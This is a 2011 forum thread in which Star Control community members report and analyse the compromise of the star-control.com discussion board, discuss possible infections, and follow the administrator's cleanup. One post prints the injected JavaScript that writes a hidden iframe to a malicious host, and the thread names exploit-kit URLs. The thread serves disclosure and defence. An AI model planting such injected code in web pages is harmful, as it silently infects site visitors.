Title: Star-control.com discussion board compromised
Post by: Megagun on August 01, 2011, 06:17:03 pm

It has come to my attention that the Star Control Discussion Board hosted on star-control.com has been compromised, and an iFrame has been injected that points towards locumresources.com.
I advise you all to not visit the SCDB (and star-control.com) right now. It appears that the following bit of javascript will be executed if you do: http://pastebin.com/csA3wBAe

I'll look into this further to see what exactly is happening.

EDIT1: seems like the following bit of code injects the iframe: http://pastebin.com/xqN1Adqu

This produces the following string:

Code:
document.write('<iframe src="http://locumresources.com/forum.php?tp=675eafec431b1f72" width="1" height="1" frameborder="0"></iframe>')

(don't visit this locumresources.com URL using your browser)

This string is then eval'd, which will embed the iframe. When your browser goes to locumresources.com, it fetches a page with a lot of random numbers, and the following bit of JavaScript: http://pastebin.com/x5D2RwKE

Once executed, this bit of JavaScript produces the following: http://pastebin.com/csA3wBAe

I'm currently decompiling the worms.jar file to see what it does.

EDIT 2: A VirusTotal report on http : // locum resources .com /k.php ?f=20 &e=2 (one of the URLs referred to in the JavaScript mess. Spaces added to protect the innocent. Do not visit this URL if you're not sure what you're doing!)
http://www.virustotal.com/file-scan/report.html?id=37e7b90d821bb14a45129c121510395547a2d1df8f4e262c7a1183e0c90e32d5-1312203813

Title: Re: Star-control.com discussion board compromised
Post by: Dabir on August 01, 2011, 07:33:45 pm

Well damn, I just visited it. I visit it first. I didn't see any iframes, but the fonts were bugged up and phpBB was issuing debug notices complaining about headers having already been sent at the top. I'd go back and check, but right now I must scan my computer.
Title: Re: Star-control.com discussion board compromised
Post by: Nuclear on August 01, 2011, 08:55:34 pm

Same here, it was pretty natural for me to visit Star-Control.com first :(
Are those actual error codes? By the look of the page's source, they might have just been typed out.

Title: Re: Star-control.com discussion board compromised
Post by: Draxas on August 01, 2011, 09:22:21 pm

Was wondering what was going on when I got all those broken script notices earlier. I also found that all the links to subforums were dead, and also kicking back broken script messages. I had no idea this had something to do with an attack site.
Well, it's my PC at work, so there's nothing I can do for it. If the virus and spyware protection here can't catch it, I'm pretty much stuck. Let us know when this gets resolved.

Title: Re: Star-control.com discussion board compromised
Post by: chenjesuwizard on August 02, 2011, 12:49:37 am

I'm scanning my computer and I ran Rkill. Rkill picked up something called Reminder.exe. It was in C:/Program Files/TTG/Reminder.exe. (That may be slightly wrong, it's from memory.) I deleted that file and hope it's that, not something else.
Title: Re: Star-control.com discussion board compromised
Post by: oldlaptop on August 02, 2011, 03:39:08 am

The SCDB front page looks clean to me now (some innocuous looking javascript probably generated by the forum software, no references to locumresources.com anywhere), but the boards are still down. All links other than 'Board Index' and the board logo bring up an error that './cache is not writable', so I'd guess that databases have been taken down for checking.
Title: Re: Star-control.com discussion board compromised
Post by: Admiral Zeratul on August 02, 2011, 05:02:26 am

I've also seen two spam threads on this forum recently. Could it be related somehow?
Title: Re: Star-control.com discussion board compromised
Post by: oldlaptop on August 02, 2011, 05:49:10 am

SCDB is back up.
Title: Re: Star-control.com discussion board compromised
Post by: Angelfish on August 02, 2011, 08:27:24 am

"SCDB is back up."

That's dangerous to say. But can we visit it without risk of getting infected? Yesterday at home it caused various virus mentions.

Title: Re: Star-control.com discussion board compromised
Post by: Megagun on August 02, 2011, 02:37:34 pm

It's gone now, yes. I checked with Firefox and NoScript enabled. The bit that inserts the iframe is gone now.
However, it could be that whoever inserted that iframe has removed it himself, perhaps because he has succeeded in his goal (steal an Admin account so that he now has access to the database/php scripts?). Unless some SCDB Admin comes forward and tells us that he's removed the offending bit of javascript, I wouldn't trust the SCDB.

Title: Re: Star-control.com discussion board compromised
Post by: Draxas on August 02, 2011, 04:02:57 pm

I'm guessing Luki would be the most likely to show up here. Until he (or Chad, or whoever) shows up, I guess I'll keep away for a while.
Title: Re: Star-control.com discussion board compromised
Post by: Anthony on August 02, 2011, 06:38:53 pm

At least the code was removed. I got ESET on my computers and the sites got blocked, and it even alerted me when I looked at the code in pastebin.
(http://i54.tinypic.com/axzf37.png)
(http://i53.tinypic.com/33k95jb.png)

The virus info from the ESET website said it's an exploit that can run "arbitrary code" on the user's PC - http://www.eset.eu/encyclopaedia/js-exploit-javadepkit-a-java-cve-2010-0886-a-javaws-bloodhound-292?lng=en

Hopefully, nobody lost anything or got their PC infected.

Title: Re: Star-control.com discussion board compromised
Post by: meep-eep on August 02, 2011, 07:12:47 pm

My observations and conclusions:
My advice:
Also, the spam on the UQM forum is just that, spam. Annoying, but relatively harmless. This happens quite frequently and is usually removed quickly enough.

Disclaimer: While IT security is what I do professionally, I have not thoroughly investigated this attack. YMMV.

Title: Re: Star-control.com discussion board compromised
Post by: Lukipela on August 02, 2011, 07:56:28 pm

Just back from non-internet land and something like this is here to spoil my day. All I know is that the site was indeed hacked and that Chad thinks he has fixed it. I've paged him to this thread, so hopefully he'll be able to clarify things more thoroughly than me. All I know is that he has locked down most things; I've no longer got FTP access to the site.
Title: Re: Star-control.com discussion board compromised
Post by: Chad on August 02, 2011, 09:00:10 pm

Megagun, thank you for letting everyone know.
Yes, when I got home on 8/1, I noticed exploit warnings being flagged by my virus scanner while using my browser. Then I figured out it was coming from the browser tab running SCDB. I'm fairly certain the compromise happened on 8/1 and I was done cleaning it up on 8/1. I spent several hours analyzing and restoring. I removed ftp access and changed account password(s).

It looks like something got in and changed index.* and login.* throughout all directories to contain the malicious code. It seems automated. I went through every single directory and restored the indexes from backup and then re-downloaded the entire contents of the site and virus scanned it again to make sure the files no longer had any malicious code.

I have no idea how they got in and if anyone has any ideas on how to figure that out, I'd love the help. Sorry for any trouble, stuff like this just sucks.

Title: Re: Star-control.com discussion board compromised
Post by: Arne on August 03, 2011, 09:49:51 pm

Was the forum software up to date?
Title: Re: Star-control.com discussion board compromised
Post by: Chad on August 04, 2011, 02:08:19 pm

No, but it is now.
Title: Re: Star-control.com discussion board compromised
Post by: jucce on August 06, 2011, 08:44:41 pm

"I have no idea how they got in and if anyone has any ideas on how to figure that out, I'd love the help."

Do you have access to any logs which can show ftp or http access? Does the forum share a server with other sites?

"Sorry for any trouble, stuff like this just sucks."